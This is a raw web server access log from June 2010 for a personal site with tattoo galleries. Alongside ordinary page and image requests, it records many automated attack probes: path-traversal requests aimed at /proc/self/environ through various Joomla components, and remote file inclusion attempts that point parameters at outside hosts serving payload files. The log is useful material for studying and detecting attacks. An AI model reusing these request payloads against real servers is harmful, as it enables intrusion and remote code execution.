174.121.64.231 - - [10/Jun/2010:00:48:23 -0500] "GET /logs//index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
174.121.64.231 - - [10/Jun/2010:00:48:24 -0500] "GET //index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
174.121.64.231 - - [10/Jun/2010:00:48:26 -0500] "GET /logs/access_log.1274832000//index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.810"
174.121.64.231 - - [10/Jun/2010:00:48:26 -0500] "GET //index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
174.121.64.231 - - [10/Jun/2010:00:48:26 -0500] "GET /logs//index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
174.121.64.231 - - [10/Jun/2010:00:48:27 -0500] "GET //index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
174.121.64.231 - - [10/Jun/2010:00:49:16 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
174.121.64.231 - - [10/Jun/2010:00:49:17 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
174.121.64.231 - - [10/Jun/2010:00:50:05 -0500] "GET /logs/access_log.1274832000//index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.810"
174.121.64.231 - - [10/Jun/2010:00:50:05 -0500] "GET //index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
174.121.64.231 - - [10/Jun/2010:00:50:05 -0500] "GET /logs//index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
174.121.64.231 - - [10/Jun/2010:00:50:13 -0500] "GET /logs/access_log.1274832000//index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.810"
174.121.64.231 - - [10/Jun/2010:00:50:13 -0500] "GET //index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
174.121.64.231 - - [10/Jun/2010:00:50:13 -0500] "GET /logs//index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
94.23.0.30 - - [10/Jun/2010:00:54:26 -0500] "GET /logs/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
94.23.0.30 - - [10/Jun/2010:00:54:26 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
94.23.0.30 - - [10/Jun/2010:00:54:31 -0500] "GET /logs/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
94.23.0.30 - - [10/Jun/2010:00:54:31 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
212.227.248.216 - - [10/Jun/2010:00:57:10 -0500] "GET /logs/?option=com_jprojectmanager&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 8947 "-""libwww-perl/5.805"
212.227.248.216 - - [10/Jun/2010:00:57:16 -0500] "GET /?option=com_jprojectmanager&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.805"
207.55.247.185 - - [10/Jun/2010:00:58:22 -0500] "GET /logs/access_log.1271030400/?sourcedir=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 311 "-""Mozilla/5.0"
207.55.247.185 - - [10/Jun/2010:00:58:22 -0500] "GET /?sourcedir=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
207.55.247.185 - - [10/Jun/2010:00:58:22 -0500] "GET /logs/?sourcedir=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 200 8947 "-""Mozilla/5.0"
174.121.158.187 - - [10/Jun/2010:00:58:28 -0500] "GET /logs//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
174.121.158.187 - - [10/Jun/2010:00:58:28 -0500] "GET //index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
207.55.247.185 - - [10/Jun/2010:00:58:56 -0500] "GET /?sourcedir=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
207.55.247.185 - - [10/Jun/2010:00:58:56 -0500] "GET /logs/access_log.1271030400/?sourcedir=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 311 "-""Mozilla/5.0"
207.55.247.185 - - [10/Jun/2010:00:58:56 -0500] "GET /logs/?sourcedir=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 200 8947 "-""Mozilla/5.0"
174.121.158.187 - - [10/Jun/2010:00:59:04 -0500] "GET //index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
207.55.247.185 - - [10/Jun/2010:00:59:12 -0500] "GET /logs/access_log.1271203200/?sourcedir=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 311 "-""Mozilla/5.0"
207.55.247.185 - - [10/Jun/2010:00:59:46 -0500] "GET /logs/access_log.1271203200/?sourcedir=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 311 "-""Mozilla/5.0"
60.234.132.61 - - [10/Jun/2010:01:00:13 -0500] "GET /logs/access_log.1273363200/?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.831"
60.234.132.61 - - [10/Jun/2010:01:00:47 -0500] "GET /logs/?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 8947 "-""libwww-perl/5.831"
207.46.199.50 - - [10/Jun/2010:01:01:09 -0500] "GET /logs/access_log.1257206400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
67.225.157.22 - - [10/Jun/2010:01:01:37 -0500] "GET /logs/access_log.1274832000//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
67.225.157.22 - - [10/Jun/2010:01:01:37 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
67.225.157.22 - - [10/Jun/2010:01:01:40 -0500] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
60.234.132.61 - - [10/Jun/2010:01:04:20 -0500] "GET /logs/index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
60.234.132.61 - - [10/Jun/2010:01:04:28 -0500] "GET /index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
67.225.157.22 - - [10/Jun/2010:01:05:28 -0500] "GET /logs/access_log.1274832000//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
67.225.157.22 - - [10/Jun/2010:01:05:28 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
67.225.157.22 - - [10/Jun/2010:01:05:28 -0500] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
67.215.230.23 - - [10/Jun/2010:01:05:32 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 ( compatible; SETOOZBOT/0.30 ; http://www.setooz.com/bot.html ; agentname at setooz dot_com )"
67.215.230.23 - - [10/Jun/2010:01:05:33 -0500] "GET /costume/ HTTP/1.0" 200 640 "-""Mozilla/5.0 ( compatible; SETOOZBOT/0.30 ; http://www.setooz.com/bot.html ; agentname at setooz dot_com )"
207.191.229.96 - - [10/Jun/2010:01:06:59 -0500] "GET //index.php?option=com_myblog&Itemid=66&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
207.191.229.96 - - [10/Jun/2010:01:07:04 -0500] "GET //index.php?option=com_myblog&Itemid=66&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
212.241.179.30 - - [10/Jun/2010:01:07:21 -0500] "GET //index.php?option=com_myblog&Itemid=66&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
212.241.179.30 - - [10/Jun/2010:01:07:27 -0500] "GET //index.php?option=com_myblog&Itemid=66&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
202.29.86.7 - - [10/Jun/2010:01:07:28 -0500] "GET /logs/access_log.1271548800////?_SERVER[DOCUMENT_ROOT]=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
202.29.86.7 - - [10/Jun/2010:01:07:28 -0500] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 200 8954 "-""Mozilla/5.0"
202.29.86.7 - - [10/Jun/2010:01:07:28 -0500] "GET ////?_SERVER[DOCUMENT_ROOT]=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 200 1005 "-""Mozilla/5.0"
88.191.94.188 - - [10/Jun/2010:01:08:08 -0500] "GET //index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
88.191.94.188 - - [10/Jun/2010:01:08:22 -0500] "GET //index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
88.191.94.188 - - [10/Jun/2010:01:09:01 -0500] "GET /logs//index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
88.191.94.188 - - [10/Jun/2010:01:09:01 -0500] "GET //index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
24.205.181.155 - - [10/Jun/2010:01:09:09 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 4192 "http://en.wikipedia.org/wiki/Flash_(tattoo)""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
24.205.181.155 - - [10/Jun/2010:01:09:09 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
24.205.181.155 - - [10/Jun/2010:01:09:10 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
211.169.249.251 - - [10/Jun/2010:01:09:14 -0500] "GET //index.php?option=com_myblog&Itemid=66&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
211.169.249.251 - - [10/Jun/2010:01:09:14 -0500] "GET //index.php?option=com_myblog&Itemid=66&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
24.205.181.155 - - [10/Jun/2010:01:09:14 -0500] "GET /tattoo/set1.htm HTTP/1.1" 200 2362 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
24.205.181.155 - - [10/Jun/2010:01:09:14 -0500] "GET /tattoo/tat1.JPG HTTP/1.1" 200 16158 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
24.205.181.155 - - [10/Jun/2010:01:09:14 -0500] "GET /tattoo/tat10.JPG HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
24.205.181.155 - - [10/Jun/2010:01:09:14 -0500] "GET /tattoo/tat3.jpg HTTP/1.1" 200 11901 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
24.205.181.155 - - [10/Jun/2010:01:09:14 -0500] "GET /tattoo/tat5.JPG HTTP/1.1" 200 13769 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
24.205.181.155 - - [10/Jun/2010:01:09:14 -0500] "GET /tattoo/tat4.JPG HTTP/1.1" 200 18080 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
24.205.181.155 - - [10/Jun/2010:01:09:14 -0500] "GET /tattoo/tat2.JPG HTTP/1.1" 200 18943 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
24.205.181.155 - - [10/Jun/2010:01:09:14 -0500] "GET /tattoo/tat6.JPG HTTP/1.1" 200 18543 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
24.205.181.155 - - [10/Jun/2010:01:09:15 -0500] "GET /tattoo/tat7.JPG HTTP/1.1" 200 17358 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
24.205.181.155 - - [10/Jun/2010:01:09:15 -0500] "GET /tattoo/tat8.jpg HTTP/1.1" 200 13191 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
24.205.181.155 - - [10/Jun/2010:01:09:15 -0500] "GET /tattoo/tat9.JPG HTTP/1.1" 200 16749 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
24.205.181.155 - - [10/Jun/2010:01:09:15 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
24.205.181.155 - - [10/Jun/2010:01:09:27 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
24.205.181.155 - - [10/Jun/2010:01:09:28 -0500] "GET /tattoo/set2.htm HTTP/1.1" 200 1953 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
24.205.181.155 - - [10/Jun/2010:01:09:28 -0500] "GET /tattoo/tatb1.JPG HTTP/1.1" 200 14848 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
24.205.181.155 - - [10/Jun/2010:01:09:28 -0500] "GET /tattoo/tatb10.JPG HTTP/1.1" 200 17887 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
24.205.181.155 - - [10/Jun/2010:01:09:28 -0500] "GET /tattoo/tatb3.JPG HTTP/1.1" 200 16163 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
24.205.181.155 - - [10/Jun/2010:01:09:28 -0500] "GET /tattoo/tatb4.JPG HTTP/1.1" 200 15705 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
24.205.181.155 - - [10/Jun/2010:01:09:28 -0500] "GET /tattoo/tatb2.JPG HTTP/1.1" 200 16592 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
24.205.181.155 - - [10/Jun/2010:01:09:28 -0500] "GET /tattoo/tatb5.JPG HTTP/1.1" 200 20135 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
24.205.181.155 - - [10/Jun/2010:01:09:28 -0500] "GET /tattoo/tatb6.JPG HTTP/1.1" 200 21190 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
24.205.181.155 - - [10/Jun/2010:01:09:28 -0500] "GET /tattoo/tatb7.JPG HTTP/1.1" 200 16193 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
24.205.181.155 - - [10/Jun/2010:01:09:28 -0500] "GET /tattoo/tatb8.JPG HTTP/1.1" 200 18467 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
24.205.181.155 - - [10/Jun/2010:01:09:28 -0500] "GET /tattoo/tatb9.JPG HTTP/1.1" 200 21598 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
24.205.181.155 - - [10/Jun/2010:01:09:29 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
24.205.181.155 - - [10/Jun/2010:01:09:42 -0500] "GET /tattoo/set3.htm HTTP/1.1" 200 1778 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
24.205.181.155 - - [10/Jun/2010:01:09:42 -0500] "GET /tattoo/tatc1.JPG HTTP/1.1" 200 21412 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
24.205.181.155 - - [10/Jun/2010:01:09:42 -0500] "GET /tattoo/tatc10.JPG HTTP/1.1" 200 14157 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
24.205.181.155 - - [10/Jun/2010:01:09:42 -0500] "GET /tattoo/tatc2.JPG HTTP/1.1" 200 17893 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
24.205.181.155 - - [10/Jun/2010:01:09:42 -0500] "GET /tattoo/tatc4.JPG HTTP/1.1" 200 12619 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
24.205.181.155 - - [10/Jun/2010:01:09:42 -0500] "GET /tattoo/tatc3.JPG HTTP/1.1" 200 16313 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
24.205.181.155 - - [10/Jun/2010:01:09:42 -0500] "GET /tattoo/tatc8.JPG HTTP/1.1" 200 17057 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
24.205.181.155 - - [10/Jun/2010:01:09:42 -0500] "GET /tattoo/tatc6.JPG HTTP/1.1" 200 14549 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
24.205.181.155 - - [10/Jun/2010:01:09:42 -0500] "GET /tattoo/tatc7.JPG HTTP/1.1" 200 12347 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
24.205.181.155 - - [10/Jun/2010:01:09:42 -0500] "GET /tattoo/tatc9.JPG HTTP/1.1" 200 18139 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
24.205.181.155 - - [10/Jun/2010:01:09:42 -0500] "GET /tattoo/tatc5.JPG HTTP/1.1" 200 19436 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
24.205.181.155 - - [10/Jun/2010:01:09:43 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
174.120.220.75 - - [10/Jun/2010:01:09:47 -0500] "GET //kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 295 "-""Mozilla/5.0"
174.120.220.75 - - [10/Jun/2010:01:09:47 -0500] "GET /logs/access_log.1271548800//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
174.120.220.75 - - [10/Jun/2010:01:09:47 -0500] "GET /logs//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
88.191.94.188 - - [10/Jun/2010:01:09:48 -0500] "GET /logs//index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
88.191.94.188 - - [10/Jun/2010:01:09:48 -0500] "GET //index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
91.121.2.170 - - [10/Jun/2010:01:09:53 -0500] "GET /index.php?option=com_fabrik&Itemid=&mosConfig.absolute.path=http://www.sereiadomar.net/tmp/id1.txt????????????? HTTP/1.1" 404 293 "-""Mozilla/5.0"
91.121.2.170 - - [10/Jun/2010:01:09:53 -0500] "GET /logs/access_log.1273363200/index.php?option=com_fabrik&Itemid=&mosConfig.absolute.path=http://www.sereiadomar.net/tmp/id1.txt????????????? HTTP/1.1" 404 320 "-""Mozilla/5.0"
91.121.2.170 - - [10/Jun/2010:01:09:53 -0500] "GET /logs/index.php?option=com_fabrik&Itemid=&mosConfig.absolute.path=http://www.sereiadomar.net/tmp/id1.txt????????????? HTTP/1.1" 404 298 "-""Mozilla/5.0"
24.205.181.155 - - [10/Jun/2010:01:09:56 -0500] "GET /tattoo/set4.htm HTTP/1.1" 200 1600 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
24.205.181.155 - - [10/Jun/2010:01:09:56 -0500] "GET /tattoo/tatd1.JPG HTTP/1.1" 200 14507 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
24.205.181.155 - - [10/Jun/2010:01:09:56 -0500] "GET /tattoo/tatd2.JPG HTTP/1.1" 200 14891 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
24.205.181.155 - - [10/Jun/2010:01:09:56 -0500] "GET /tattoo/tatd3.JPG HTTP/1.1" 200 12386 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
24.205.181.155 - - [10/Jun/2010:01:09:56 -0500] "GET /tattoo/tatd4.JPG HTTP/1.1" 200 12068 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
24.205.181.155 - - [10/Jun/2010:01:09:56 -0500] "GET /tattoo/tatd6.JPG HTTP/1.1" 200 12059 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
24.205.181.155 - - [10/Jun/2010:01:09:56 -0500] "GET /tattoo/tatd7.JPG HTTP/1.1" 200 20479 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
24.205.181.155 - - [10/Jun/2010:01:09:56 -0500] "GET /tattoo/tatd10.JPG HTTP/1.1" 200 19089 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
